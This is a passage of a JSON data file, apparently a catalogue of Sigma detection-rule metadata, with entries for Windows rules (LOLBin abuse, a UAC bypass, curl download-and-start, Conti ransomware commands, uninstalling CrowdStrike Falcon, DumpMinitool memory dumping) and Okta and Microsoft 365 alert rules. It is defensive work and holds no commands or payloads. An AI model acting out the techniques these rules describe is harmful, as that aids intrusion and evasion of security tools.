"Nasreddine Bencherchali, memory-shards", + "creation_date": "2022/12/24", + "falsepositive": [ + "Legitimate use via Intune management. You exclude script paths and names to reduce FP rate" + ], + "filename": "proc_creation_win_lolbin_agentexecutor.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/jseerden/status/1247985304667066373/photo/1", + "https://twitter.com/lefterispan/status/1286259016436514816", + "https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "7efd2c8d-8b18-45b7-947d-adfe9ed04f61", + "value": "AgentExecutor PowerShell Execution" + }, + { + "description": "Detects execution of renamed version of PAExec. Often used by attackers", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/22", + "falsepositive": [ + "Weird admins that rename their tools", + "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", + "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" + ], + "filename": "proc_creation_win_susp_renamed_paexec.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.poweradmin.com/paexec/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_paexec.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "c4e49831-1496-40cf-8ce1-b53f942b02f9", + "value": "Renamed PAExec" + }, + { + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques", + "meta": { + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate OpenVPN TAP insntallation" + ], + "filename": "proc_creation_win_tap_installer_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tap_installer_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048" + ] + }, + "uuid": "99793437-3e16-439b-be0f-078782cf953d", + "value": "Tap Installer Execution" + }, + { + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "value": "UAC Bypass Using NTFS Reparse Point - Process" + }, + { + "description": "Detects suspicious SSH tunnel port forwarding to a local port", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/12", + "falsepositive": [ + "Administrative activity using a remote port forwarding to a local port" + ], + "filename": "proc_creation_win_susp_ssh_port_forward.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ssh_port_forward.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001" + ] + }, + "uuid": "327f48c1-a6db-4eb8-875a-f6981f1b0183", + "value": "Suspicious SSH Port Forwarding" + }, + { + "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files. It can be abused to run malicious \".xbap\" files any bypass AWL", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/01", + "falsepositive": [ + "Legitimate \".xbap\" being executed via \"PresentationHost\"" + ], + "filename": "proc_creation_win_lolbin_presentationhost.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "d22e2925-cfd8-463f-96f6-89cec9d9bc5f", + "value": "Application Whitelisting Bypass via PresentationHost.exe" + }, + { + "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/13", + "falsepositive": [ + "Unknown", + "Some cases in which the service spawned a werfault.exe process" + ], + "filename": "proc_creation_win_rpcss_anomalies.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809", + "https://twitter.com/cyb3rops/status/1514217991034097664", + "https://www.bleepingcomputer.com/startups/RpcSs.exe-14544.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rpcss_anomalies.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "a7cd7306-df8b-4398-b711-6f3e4935cf16", + "value": "Remote Procedure Call Service Anomaly" + }, + { + "description": "Detects execution of of Dxcap.exe", + "meta": { + "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali (update)", + "creation_date": "2019/10/26", + "falsepositive": [ + "Legitimate execution of dxcap.exe by legitimate user" + ], + "filename": "proc_creation_win_lolbin_susp_dxcap.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/harr0ey/status/992008180904419328", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "60f16a96-db70-42eb-8f76-16763e333590", + "value": "Application Whitelisting Bypass via Dxcap.exe" + }, + { + "description": "Conti ransomware command line ioc", + "meta": { + "author": "frack113", + "creation_date": "2021/10/12", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_conti_cmd_ransomware.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/VK_Intel/status/1447795359900704769?t=Xz7vaLTvaaCZ5kHoZa6gMw&s=19", + "https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conti_cmd_ransomware.yml" + ], + "tags": [ + "attack.impact", + "attack.s0575", + "attack.t1486" + ] + }, + "uuid": "689308fc-cfba-4f72-9897-796c1dc61487", + "value": "Conti Ransomware Execution" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/02/13", + "falsepositive": [ + "Legitimate usage of the tool" + ], + "filename": "proc_creation_win_screenconnect.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_screenconnect.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "57bff678-25d1-4d6c-8211-8ca106d12053", + "value": "Use of ScreenConnect Remote Access Software" + }, + { + "description": "Detects suspicious ways to use of a Visual Studio bundled tool named DumpMinitool.exe", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_proc_dump_susp_dumpminitool.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1511489821247684615", + "https://twitter.com/mrd0x/status/1511415432888131586", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_susp_dumpminitool.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ] + }, + "uuid": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "value": "Suspicious DumpMinitool Usage" + }, + { + "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/09/20", + "falsepositive": [ + "Windows installed on non-C drive" + ], + "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/", + "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", + "value": "Xwizard DLL Sideloading" + }, + { + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", + "meta": { + "author": "frack113", + "creation_date": "2021/07/12", + "falsepositive": [ + "Uninstall by admin" + ], + "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "f0f7be61-9cf5-43be-9836-99d6ef448a18", + "value": "Uninstall Crowdstrike Falcon" + }, + { + "description": "Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate use of the system utilities to discover system time for legitimate reason" + ], + "filename": "proc_creation_win_remote_time_discovery.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_time_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1124" + ] + }, + "uuid": "b243b280-65fe-48df-ba07-6ddea7646427", + "value": "Discovery of a System Time" + }, + { + "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", + "meta": { + "author": "Sreeman, Nasreddine Bencherchali", + "creation_date": "2020/01/13", + "falsepositive": [ + "Administrative scripts (installers)" + ], + "filename": "proc_creation_win_susp_curl_start_combo.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_start_combo.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", + "value": "Curl Start Combination" + }, + { + "description": "Detects the conhost execution as parent process. Can be used to evaded defense mechanism.", + "meta": { + "author": "omkar72", + "creation_date": "2020/10/25", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_conhost.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_conhost.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "7dc2dedd-7603-461a-bc13-15803d132355", + "value": "Conhost Parent Process Executions" + }, + { + "description": "Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that doesnt exist. This non-existent DLL file is named \"ShellChromeAPI.dll\". \nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", + "meta": { + "author": "@gott_cyber", + "creation_date": "2022/08/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_deviceenroller_evasion.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://mobile.twitter.com/0gtweet/status/1564131230941122561", + "https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_deviceenroller_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "e173ad47-4388-4012-ae62-bd13f71c18a8", + "value": "DLL Sideloading via DeviceEnroller.exe" + }, + { + "description": "An adversary may use Radmin Viewer Utility to remotely control Windows device", + "meta": { + "author": "frack113", + "creation_date": "2022/01/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_radmin.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1072/T1072.md", + "https://www.radmin.fr/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_radmin.yml" + ], + "tags": [ + "attack.execution", + "attack.lateral_movement", + "attack.t1072" + ] + }, + "uuid": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", + "value": "Use Radmin Viewer Utility" + }, + { + "description": "Detects a command used by conti to find volume shadow backups", + "meta": { + "author": "Max Altgelt, Tobias Michalski", + "creation_date": "2021/08/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_malware_conti.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti.yml" + ], + "tags": [ + "attack.t1587.001", + "attack.resource_development" + ] + }, + "uuid": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", + "value": "Conti Volume Shadow Listing" + }, + { + "description": "Detects suspicious powershell invocations from interpreters or unusual programs", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/01/16", + "falsepositive": [ + "Microsoft Operations Manager (MOM)", + "Other scripts" + ], + "filename": "proc_creation_win_susp_powershell_parent_combo.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.carbonblack.com/2017/03/15/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_parent_combo.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "95eadcb2-92e4-4ed1-9031-92547773a6db", + "value": "Suspicious PowerShell Invocation Based on Parent Process" + }, + { + "description": "Detect an interactive AT job, which may be used as a form of privilege escalation.", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unlikely (at.exe deprecated as of Windows 8)" + ], + "filename": "proc_creation_win_interactive_at.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_interactive_at.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1053.002" + ] + }, + "uuid": "60fc936d-2eb0-4543-8a13-911c750a1dfc", + "value": "Interactive AT Job" + }, + { + "description": "Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/27", + "falsepositive": [ + "Other programs that cause these patterns (please report)" + ], + "filename": "proc_creation_win_priv_escalation_via_named_pipe.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/privilege-escalation-via-named-pipe-impersonation.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_priv_escalation_via_named_pipe.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021" + ] + }, + "uuid": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", + "value": "Privilege Escalation via Named Pipe Impersonation" + }, + { + "description": "Detects suspicious scheduled task creations with commands that are uncommon", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/23", + "falsepositive": [ + "Software installers that run from temporary folders and also install scheduled tasks" + ], + "filename": "proc_creation_win_susp_schtasks_pattern.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_pattern.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + "uuid": "f2c64357-b1d2-41b7-849f-34d2682c0fad", + "value": "Suspicious Add Scheduled Command Pattern" + }, + { + "description": "Detects when an security threat is detected in Okta.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "okta_security_threat_detected.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_security_threat_detected.yml" + ], + "tags": "No established tags" + }, + "uuid": "5c82f0b9-3c6d-477f-a318-0e14a1df73e0", + "value": "Okta Security Threat Detected" + }, + { + "description": "Detects when an user account is locked out.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "okta_user_account_locked_out.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_user_account_locked_out.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "14701da0-4b0f-4ee6-9c95-2ffb4e73bb9a", + "value": "Okta User Account Locked Out" + }, + { + "description": "Detects when a API Token is revoked.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "okta_api_token_revoked.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_revoked.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "cf1dbc6b-6205-41b4-9b88-a83980d2255b", + "value": "Okta API Token Revoked" + }, + { + "description": "Detects when an Policy Rule is Modified or Deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "okta_policy_rule_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "0c97c1d3-4057-45c9-b148-1de94b631931", + "value": "Okta Policy Rule Modified or Deleted" + }, + { + "description": "Detects when unauthorized access to app occurs.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "User might of believe that they had access." + ], + "filename": "okta_unauthorized_access_to_app.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_unauthorized_access_to_app.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "6cc2b61b-d97e-42ef-a9dd-8aa8dc951657", + "value": "Okta Unauthorized Access to App" + }, + { + "description": "Detects when an application Sign-on Policy is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "okta_application_sign_on_policy_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "8f668cc4-c18e-45fe-ad00-624a981cf88a", + "value": "Okta Application Sign-On Policy Modified or Deleted" + }, + { + "description": "Detects when an the Administrator role is assigned to an user or group.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Administrator roles could be assigned to users or group by other admin users." + ], + "filename": "okta_admin_role_assigned_to_user_or_group.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "413d4a81-6c98-4479-9863-014785fd579c", + "value": "Okta Admin Role Assigned to an User or Group" + }, + { + "description": "Detects when an application is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "okta_application_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "7899144b-e416-4c28-b0b5-ab8f9e0a541d", + "value": "Okta Application Modified or Deleted" + }, + { + "description": "Detects when an Network Zone is Deactivated or Deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "okta_network_zone_deactivated_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "9f308120-69ed-4506-abde-ac6da81f4310", + "value": "Okta Network Zone Deactivated or Deleted" + }, + { + "description": "Detects when a API token is created", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "okta_api_token_created.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_created.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "19951c21-229d-4ccb-8774-b993c3ff3c5c", + "value": "Okta API Token Created" + }, + { + "description": "Detects when an attempt at deactivating or resetting MFA.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/21", + "falsepositive": [ + "If a MFA reset or deactivated was performed by a system administrator." + ], + "filename": "okta_mfa_reset_or_deactivated.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "50e068d7-1e6b-4054-87e5-0a592c40c7e0", + "value": "Okta MFA Reset or Deactivated" + }, + { + "description": "Detects when an Okta policy is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Okta Policies being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Okta Policies modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "okta_policy_modified_or_deleted.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "1667a172-ed4c-463c-9969-efd92195319a", + "value": "Okta Policy Modified or Deleted" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP address.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/23", + "falsepositive": [ + "User using a VPN or Proxy" + ], + "filename": "microsoft365_activity_from_anonymous_ip_addresses.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1573" + ] + }, + "uuid": "d8b0a4fe-07a8-41be-bd39-b14afa025d95", + "value": "Activity from Anonymous IP Addresses" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_data_exfiltration_to_unsanctioned_app.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1537" + ] + }, + "uuid": "2b669496-d215-47d8-bd9a-f4a45bf07cda", + "value": "Data Exfiltration to Unsanctioned Apps" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported users were active from an IP address identified as risky by Microsoft Threat Intelligence.\nThese IP addresses are involved in malicious activities, such as Botnet C&C, and may indicate compromised account.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_from_susp_ip_addresses.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_from_susp_ip_addresses.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1573" 